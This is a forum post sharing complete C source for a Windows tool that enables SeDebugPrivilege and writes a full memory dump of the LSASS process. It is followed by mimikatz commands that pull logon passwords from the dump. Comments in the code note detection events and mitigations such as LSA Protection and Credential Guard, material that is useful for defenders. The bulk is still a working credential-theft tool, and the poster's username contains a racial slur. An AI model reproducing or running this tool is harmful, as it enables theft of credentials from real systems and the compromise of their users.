Old 03-20-2025, 10:11 AM

lilbossnigga lilbossnigga is offline
Join Date: Mar 2021
Posts: 2
//lsass mem dump
//
//coded by sasami_327
////////////////////////////////////////////////////////
#include <Windows.h>
#include <DbgHelp.h>
#include <stdio.h>
#include <TlHelp32.h>
#pragma comment(lib, "dbghelp")
#define CWA(dll, api) ::api
// Enables SeDebugPrivilege on the current process token.
// Returns TRUE only when OpenProcessToken, LookupPrivilegeValueA and
// AdjustTokenPrivileges all succeed; every failure path prints GetLastError().
// The privilege must already be present in the token (administrators hold it
// by default), which is why restricting local-admin membership stops this step.
// Defenders: a privilege adjustment on its own is noisy and common; the signal
// is this adjustment followed shortly by a handle open to lsass.exe.
BOOL EnableSeDebugPrivilege(VOID)
{
HANDLE token = NULL;
LUID luid, *pluid;
TOKEN_PRIVILEGES tokenPriv, *ptokenPriv;
BOOL ret = FALSE;
// TOKEN_ADJUST_PRIVILEGES is required by AdjustTokenPrivileges; TOKEN_QUERY by the lookup.
if ( CWA(kernel32, OpenProcessToken)(CWA(kernel32, GetCurrentProcess()), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &token) )
{
printf("Successfully OpenProcessToken\n");
pluid = &luid;
// Resolve the privilege name to its LUID on this machine.
if ( CWA(kernel32, LookupPrivilegeValueA(NULL, "SeDebugPrivilege", pluid)) )
{
printf("Successfully LookupPrivilegeValueA\n");
// Single-entry privilege array: enable the LUID looked up above.
ptokenPriv = &tokenPriv;
ptokenPriv->PrivilegeCount = 1;
ptokenPriv->Privileges[0].Luid = luid;
ptokenPriv->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// No previous-state buffer is requested (0, NULL), so the old state is discarded.
if ( AdjustTokenPrivileges(token, FALSE, ptokenPriv, 0, 0, NULL) )
{
printf("Successfully AdjustTokenPrivileges\n");
ret = TRUE;
}
else
{
printf("Failed to AdjustTokenPrivileges with error=%d\n", GetLastError());
}
}
else
{
printf("Failed to LookupPrivilegeValueA with error=%d\n", GetLastError());
}
// Token handle is closed on both the success and the lookup-failure path.
CWA(kernel32, CloseHandle)(token);
}
else
{
printf("Failed to OpenProcessToken with error=%d\n", GetLastError());
}
return(ret);
}
// Writes a full-memory minidump of process `pid` to "lsass.dmp" in the current
// directory and prints "OK" on success. Every failure in this function is silent.
// Detection points, each visible in standard telemetry:
//  - the handle open to lsass.exe (Sysmon Event ID 10 / ProcessAccess, EDR
//    user-mode hooks on this access mask);
//  - dbghelp.dll loaded by a process that then touches LSASS (Sysmon Event ID 7);
//  - a .dmp file created on disk in the same time window.
// Mitigation: LSA Protection (RunAsPPL) refuses this handle to non-protected
// callers, and Credential Guard keeps the secrets out of LSASS's address space,
// so the dump contains nothing usable.
VOID dump(DWORD pid)
{
HANDLE process = NULL;
HANDLE file = NULL;
// Access mask requested on the target; this is the event that access-monitoring rules key on.
if ( ( process = CWA(kernel32, OpenProcess)(PROCESS_QUERY_INFORMATION|PROCESS_VM_ READ, FALSE, pid) ) )
{
// CREATE_ALWAYS: any existing lsass.dmp in the working directory is overwritten.
if ( INVALID_HANDLE_VALUE != ( file = CWA(kernel32, CreateFileA)("lsass.dmp", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL) ) )
{
// MiniDumpWithFullMemory captures the entire address space, not just stacks and module lists.
if ( CWA(dbghelp, MiniDumpWriteDump)(
process,
pid,
file,
MiniDumpWithFullMemory,
NULL,
NULL,
NULL
) )
{
printf("OK\n");
}
CWA(kernel32, CloseHandle)(file);
}
CWA(kernel32, CloseHandle)(process);
}
}
// Returns the PID of the first process whose image name equals `procName`
// exactly (case-sensitive strcmp against szExeFile), or (DWORD)-1 if none match.
// Uses a Toolhelp process snapshot; the snapshot handle is closed before returning.
DWORD GetPIDByProcessName(char* procName)
{
// -1 stored in a DWORD is 0xFFFFFFFF; main() compares against -1 under the same conversion.
DWORD retPID = -1;
PROCESSENTRY32 pEntry32, *ppEntry32;
HANDLE snapshot = NULL;
if ( INVALID_HANDLE_VALUE != (snapshot = CWA(kernel32, CreateToolhelp32Snapshot)(TH32CS_SNAPPROCESS, 0)) )
{
ppEntry32 = &pEntry32;
// dwSize must be set before Process32First or the call fails.
ppEntry32->dwSize = sizeof(pEntry32);
if ( CWA(kernel32, Process32First(snapshot, ppEntry32)) )
{
// The loop leaves only on a name match or when Process32Next fails with ERROR_NO_MORE_FILES.
for ( ; ; )
{
if ( !strcmp(procName, ppEntry32->szExeFile) )
{
retPID = ppEntry32->th32ProcessID;
break;
}
if ( !CWA(kernel32, Process32Next(snapshot, ppEntry32)) )
{
if ( ERROR_NO_MORE_FILES == GetLastError() )
{
break;
}
}
}
}
CWA(kernel32, CloseHandle)(snapshot);
}
return(retPID);
}
// Entry point: locate lsass.exe by name, enable SeDebugPrivilege, then dump it.
// argc/argv are unused; the target name and output file are fixed in code.
// The whole chain -- process enumeration, privilege enable, LSASS handle open,
// dbghelp load, .dmp write -- is the behavioural signature to alert on, and the
// mitigations noted on dump() (LSA Protection, Credential Guard) break it at the handle step.
int main(int argc, char* argv[])
{
DWORD lsass = GetPIDByProcessName("lsass.exe");
// (DWORD)-1 is the not-found sentinel returned by GetPIDByProcessName.
if ( -1 != lsass )
{
printf("lsass=%d\n", lsass);
if ( EnableSeDebugPrivilege() )
{
dump(lsass);
}
}
return(0);
}

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
